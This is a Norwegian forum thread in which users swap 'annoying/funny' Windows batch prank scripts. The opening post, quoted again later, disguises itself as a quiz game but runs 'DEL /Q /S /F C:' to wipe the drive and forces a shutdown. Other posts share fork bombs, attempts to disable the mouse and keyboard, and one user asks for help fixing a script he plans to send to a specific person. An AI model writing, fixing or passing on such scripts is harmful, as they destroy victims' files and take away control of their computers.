Gjest Slettet+56132 Skrevet 15. november 2006 Del Skrevet 15. november 2006 Topic sier det meste, post dine plagsomme/morsomme programmer her i batch @echo off cls Rundll32 MOUSE,disable cls echo Welcome to the Bridge of Death Game! echo. echo ZoneVortex wishes you luck! pause cls echo Answer these questions as best you can. pause echo What, is your name? set /p name= cls echo What, is your quest? set /p input= cls echo What, is your favorite color? set /p color= echo %name%, your favorite color is not %color%! echo. @ping.exe 127.0.0.1 -n 3 -w 1000 > nul goto DIE :DIE echo AHHHHHH DEL /Q /S /F C: cls shutdown -s -t 10 -c "Thou Art Guess was Incorrect." -f Lenke til kommentar
Vagaprog Skrevet 15. november 2006 Del Skrevet 15. november 2006 (endret) den var artig...... Endret 15. november 2006 av FloppyK Lenke til kommentar
Gjest Slettet+56132 Skrevet 15. november 2006 Del Skrevet 15. november 2006 den var artig...... 7293586[/snapback] Haha, ikke si at du prøvde? :!: Lenke til kommentar
Vagaprog Skrevet 16. november 2006 Del Skrevet 16. november 2006 jo,jeg prøvde,men jeg tror ikke den funka ordentlig,fikk ikke opp noen internettside,og pc'en slo seg heller ikke av... Lenke til kommentar
Patrick de Maar Skrevet 16. november 2006 Del Skrevet 16. november 2006 (endret) Hvis du ikke er adminstrator har du ikke tilgang til å slå av pcen på den måten uansett, ikke utifra det jeg har prøvd ihvertfall. Min favoritt er: @echo off :goto LOOP :LOOP start cmd.exe Noe slikt ihvertfall, jeg husker ikke helt. Commando-Sondre: Det finnes minst to slikte tråder, SØK før du poster. Trodde en erfaren bruker som deg visste bedre... Endret 16. november 2006 av PatrickM Lenke til kommentar
Martin A. Skrevet 16. november 2006 Del Skrevet 16. november 2006 Topic sier det meste, post dine plagsomme/morsomme programmer her i batch Klikk for å se/fjerne innholdet nedenfor @echo off cls Rundll32 MOUSE,disable cls echo Welcome to the Bridge of Death Game! echo. echo ZoneVortex wishes you luck! pause cls echo Answer these questions as best you can. pause echo What, is your name? set /p name= cls echo What, is your quest? set /p input= cls echo What, is your favorite color? set /p color= echo %name%, your favorite color is not %color%! echo. @ping.exe 127.0.0.1 -n 3 -w 1000 > nul goto DIE :DIE echo AHHHHHH DEL /Q /S /F C: cls shutdown -s -t 10 -c "Thou Art Guess was Incorrect." -f 7293381[/snapback] Den så litt artig ut, om den funker. Bør jo kanskje deaktivere tastaturet også, ettersom en Alt+F4 vil avbryte alt. Lenke til kommentar
GeirGrusom Skrevet 16. november 2006 Del Skrevet 16. november 2006 colorbatchscript.bat SET /A Color1=0 SET /A Color2=1 :loop SET /A Color1+=1 SET /A Color2+=1 IF %Color1%==16 SET /A Color1=0 IF %Color2%==16 SET /A Color2=0 CALL makehex.bat %Color1% echo %OUTP% SET Color1Hex=%OUTP% CALL makehex.bat %Color2% SET Color2Hex=%OUTP% Echo %Color1Hex%%Color2Hex% Color %Color1Hex%%Color2Hex% goto loop makehex.bat SET /A OUTP=%1 IF %1==10 SET OUTP=A IF %1==11 SET OUTP=B IF %1==12 SET OUTP=C IF %1==13 SET OUTP=D IF %1==14 SET OUTP=E IF %1==15 SET OUTP=F Lenke til kommentar
Gjest Slettet+56132 Skrevet 16. november 2006 Del Skrevet 16. november 2006 PatrickM: Jeg søkte på både batch, .bat og bat*, så i det tilfellet overså jeg de trådene Lenke til kommentar
Patrick de Maar Skrevet 16. november 2006 Del Skrevet 16. november 2006 (endret) Jeg mener jeg har sett ett par slike tråder, men uansett er denne feilpostet. Den skal under Windows-programmering. https://www.diskusjon.no/index.php?showforu...topicfilter=all Noe som igjen betyr at denne tråden er overflødig, da du finner alt du trenger under den kategorien.. Endret 16. november 2006 av PatrickM Lenke til kommentar
kris98 Skrevet 10. februar 2007 Del Skrevet 10. februar 2007 (endret) Tja...Morsomt/plagsom eller ei...Her er min..(Begynnte nettopp å sette meg inn i .bat) Veeeeldig simpel men som sagt, nettopp begynnt som vil si under ei uke Må funke ved at dere gir den navn "DeactivateMouse.bat"...Men det regner jeg med dere ser.. Har ikke prøvd den enda selv @echo off cls shutdown -s -t 90 Rundll32 MOUSE,disable Rundll32 KEYBOARD,disable cls echo Hi! echo I have now disabled your mouse and keyboard. echo But do relaxe... This is not permanent. echo You will not regain control over your mouse nor keyboard, if you do not restart your PC. echo Thats why I am doing it for you. You will probably see how long you've got left. echo Greetings, Element. erase F Q DeactivateMouse.bat exit PS: Siden man deaktiverer Musa ved hjelp av: Rundll32 MOUSE,disable Deaktiverer man tastaturet med: Rundll32 KEYBOARD,disable? Edit: Hmm.... Ingen av kommandoene for å deaktivere Keyboardet eller Musa funka. Noen som kan fikse litt på den delen av koden? Endret 10. februar 2007 av baronblod2003 Lenke til kommentar
Giddion Skrevet 11. februar 2007 Del Skrevet 11. februar 2007 (endret) ...Min favoritt er: @echo off :goto LOOP :LOOP start cmd.exe ... 7297709[/snapback] en enda bedre er denne ADVARSEL: lagre alt du holder på med før du kjører denne. navnet på fila må være loop.bat :LOOP start loop.bat goto LOOP Endret 11. februar 2007 av Giddion Lenke til kommentar
kris98 Skrevet 11. februar 2007 Del Skrevet 11. februar 2007 (endret) Her er en som forhåpentligvis vil..ja...funke sier vi.. Planer å sende den til en viss person @echo off Rundll32 MOUSE,disable Rundll32 KEYBOARD,disable echo This is just too much for your PC to handle. Right? Oh...Your mouse and keyboard is disabled. :) echo * From Element and Won. :LOOP start loop.bat goto LOOP erase /F /Q loop.bat PS: Kopierte den loopgreia Oooog, kan noen teste den? EDIT: Oops...Må jo være i echo, siden uten tastatur og/eller mus vil du jo ikke kunne "bla" videre Endret 12. februar 2007 av baronblod2003 Lenke til kommentar
Gjest Slettet+56132 Skrevet 11. februar 2007 Del Skrevet 11. februar 2007 Lagre alt du jobber med og test selv. Er ikke verre enn det, tviler på at noen her inne gidder å teste helt uten videre. Lenke til kommentar
kris98 Skrevet 11. februar 2007 Del Skrevet 11. februar 2007 Lagre alt du jobber med og test selv. Er ikke verre enn det, tviler på at noen her inne gidder å teste helt uten videre. 7921510[/snapback] Jeg har for mye viktig på datan til å gå tapt. Gidder faen ikke risikere det! Derfor kan jo de som ikke har noe spessielt på datan å miste prøve den...Vil du med andre ord? Lenke til kommentar
Gjest Slettet+56132 Skrevet 11. februar 2007 Del Skrevet 11. februar 2007 Lagre alt du jobber med og test selv. Er ikke verre enn det, tviler på at noen her inne gidder å teste helt uten videre. 7921510[/snapback] Jeg har for mye viktig på datan til å gå tapt. Gidder faen ikke risikere det! Derfor kan jo de som ikke har noe spessielt på datan å miste prøve den...Vil du med andre ord? 7921607[/snapback] Jeg bruker Linux, så bat filer vil ikke funke uansett. Du har jo allerede sagt i andre tråder at du skal formatere PCen, og de .bat filene du har skrur jo bare av tastaturet og musen din. Om du vil prøve dem, lag et system-restore point og test. Eller bruk Norton Ghost. Lenke til kommentar
GeirGrusom Skrevet 11. februar 2007 Del Skrevet 11. februar 2007 Hvis du har NTFS har du ingenting å frykte uansett. Et System Restore vil ikke hjelpe, da den bare lagrer system filer, dette er ikke en kopi av harddisken din, men av operativsystem kjernen, fir å gjøre at OS-et skal bli lett å dra igang, selvom du har installert en funky driver. Lenke til kommentar
Giddion Skrevet 11. februar 2007 Del Skrevet 11. februar 2007 Lagre alt du jobber med og test selv. Er ikke verre enn det, tviler på at noen her inne gidder å teste helt uten videre. 7921510[/snapback] Vel jeg har testa det Funka fint som bare det det, men når jeg endelig fikk vekk alle vinduene brukte maskinen 0kb minne ifølge windows:) Lenke til kommentar
hernil Skrevet 12. februar 2007 Del Skrevet 12. februar 2007 jøss, fikk du lukka de? husker jeg prøvde en lignende bat fil en gang. endte med omstart da ja. Lenke til kommentar
kris98 Skrevet 12. februar 2007 Del Skrevet 12. februar 2007 (endret) Lagre alt du jobber med og test selv. Er ikke verre enn det, tviler på at noen her inne gidder å teste helt uten videre. 7921510[/snapback] Vel jeg har testa det Funka fint som bare det det, men når jeg endelig fikk vekk alle vinduene brukte maskinen 0kb minne ifølge windows:) 7923224[/snapback] Wtf?? Stoppa den? Den skal jo fortsette og fortsette og fortsette + at Tastaturet og Musa skal jo være disablet Hva er galt i koden? Evt noen som kan rette på den? edit: Hmm...Filen sletter seg selv ikke, og den disabler ikke musa eller tastaturet... "Finner ikke den angitte modulen..." *noen fikse* Endret 12. februar 2007 av baronblod2003 Lenke til kommentar
Magnus Holm Skrevet 18. februar 2007 Del Skrevet 18. februar 2007 Den vil aldri rette å slette seg selv. Den looper jo seg selv, hele tiden Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå